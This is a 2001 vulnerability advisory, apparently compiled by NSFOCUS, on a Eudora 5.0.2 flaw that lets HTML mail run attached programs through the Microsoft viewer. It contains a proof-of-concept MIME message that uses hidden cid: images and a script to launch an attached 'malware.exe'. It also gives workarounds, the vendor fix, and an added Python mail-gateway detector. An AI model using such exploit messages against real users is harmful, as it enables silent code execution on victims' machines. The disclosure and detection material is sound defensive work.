Security Vulnerability
Eudora 'Use Microsoft Viewer' Option Allows Malicious Code Execution

Published: 2001-03-28
Updated: 2001-03-28

Affected systems:

Qualcomm Eudora 5.0.2
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
Unaffected systems:

Qualcomm Eudora 5.1
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
Description:

BUGTRAQ  ID: 2490
CVE(CAN) ID: CVE-2001-0365

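When the 'Use Microsoft Viewer' option is enabled in Eudora, HTML mail is
rendered with IE. Eudora also has an 'allow executables in HTML content'
option. Although the manual recommends disabling that option, and it is
disabled by default, an attacker can still bypass the restriction and execute
arbitrary code on the remote host if 'Use Microsoft Viewer' is enabled.

<*Source: http-equiv@excite.com (http-equiv@excite.com) *>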


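Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!


http-equiv@excite.com provided the following test code:

Sending the following message to a Eudora user may cause that user to run the program in the attachment.
Note that the user is affected even without manually running the attached program.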

MIME-Version: 1.0
To:
Subject: YOU!DORA
Content-Type: multipart/related;
boundary="------------CF416DC77A62458520258885"


--------------CF416DC77A62458520258885
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 3.2//en">

<html>

<head>
<title>YOU!DORA</title>

</head>

<body bgcolor="#0000ff" text="#000000" link="#0000ff" vlink="#800080" alink="#ff0000">
<br>
<br>
<img SRC="cid:mr.malware.to.you" style="display:none">
<img id=W0W src="cid:malware.com"   style="display:none">
<center><h6>YOU!DORA</h6></center>
<IFRAME  id=malware width=10 height=10 style="display:none" ></IFRAME>

  <script>
// 18.03.01 http://www.malware.com
malware.location.href=W0W.src
</script>
</body>

</html>


--------------CF416DC77A62458520258885
Content-Type: application/octet-stream
Content-ID: <mr.malware.to.you>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"
--------------CF416DC77A62458520258885
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="You!DORA.html"
--------------CF416DC77A62458520258885--




Recommendations:

Temporary workaround:

Disable the 'Use Microsoft Viewer' and 'allow executables in HTML content' options,
or disable execution of JavaScript and ActiveX in the IE settings.
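
For mail gateways in front of clients that cannot yet be reconfigured or upgraded, the following added example (not part of the original advisory) flags the structural traits visible in the test message above: an HTML body whose cid: references resolve to an inline part with an executable filename, or to an HTML file declared as application/octet-stream, together with a script in the body. The function names, rule names, extension list and sample message are assumptions constructed for illustration.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Assumption: extensions treated as executable; extend for your environment.
EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".hta")
CID_REF = re.compile(r"cid:([^\"'\s>]+)", re.I)

def inspect_message(raw: bytes) -> list:
    """Return (rule, cid, filename) findings; an empty list means nothing flagged."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    refs, by_cid, script = set(), {}, False
    for part in msg.walk():
        if part.is_multipart():
            continue
        cid = str(part.get("Content-ID", "")).strip().strip("<>").lower()
        if cid:
            by_cid[cid] = part
        if part.get_content_type() == "text/html":
            html = (part.get_payload(decode=True) or b"").decode("latin-1")
            refs |= {c.lower() for c in CID_REF.findall(html)}
            script = script or re.search(r"<script\b", html, re.I) is not None
    findings = []
    for cid in sorted(c for c in refs if c in by_cid):
        name = (by_cid[cid].get_filename() or "").lower()
        if name.endswith(EXEC_EXT):
            findings.append(("executable-via-cid", cid, name))
        elif (by_cid[cid].get_content_type() == "application/octet-stream"
              and name.endswith((".htm", ".html"))):
            findings.append(("html-as-octet-stream-via-cid", cid, name))
    if script and findings:
        findings.append(("script-in-html-body", "", ""))
    return findings

def build_sample() -> bytes:
    """Constructed message with the same part layout; payloads are inert placeholders."""
    m = EmailMessage()
    m.set_content('<html><body><img src="cid:part.one"><img src="cid:part.two">\n'
                  "<script>/* inert */</script></body></html>", subtype="html")
    for cid, name in (("part.one", "sample.exe"), ("part.two", "page.html")):
        m.add_related(b"placeholder", "application", "octet-stream",
                      cid=f"<{cid}>", filename=name, disposition="inline")
    return m.as_bytes()

if __name__ == "__main__":
    for finding in inspect_message(build_sample()):
        print(finding)
```

The HTML part is decoded from its transfer encoding before matching, so a body sent as base64 or quoted-printable is inspected the same way as a 7bit one.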

Vendor patch:

This issue has been fixed in Eudora 5.1. The 5.1 beta is currently available for download at:
http://www.eudora.com/betas


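This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.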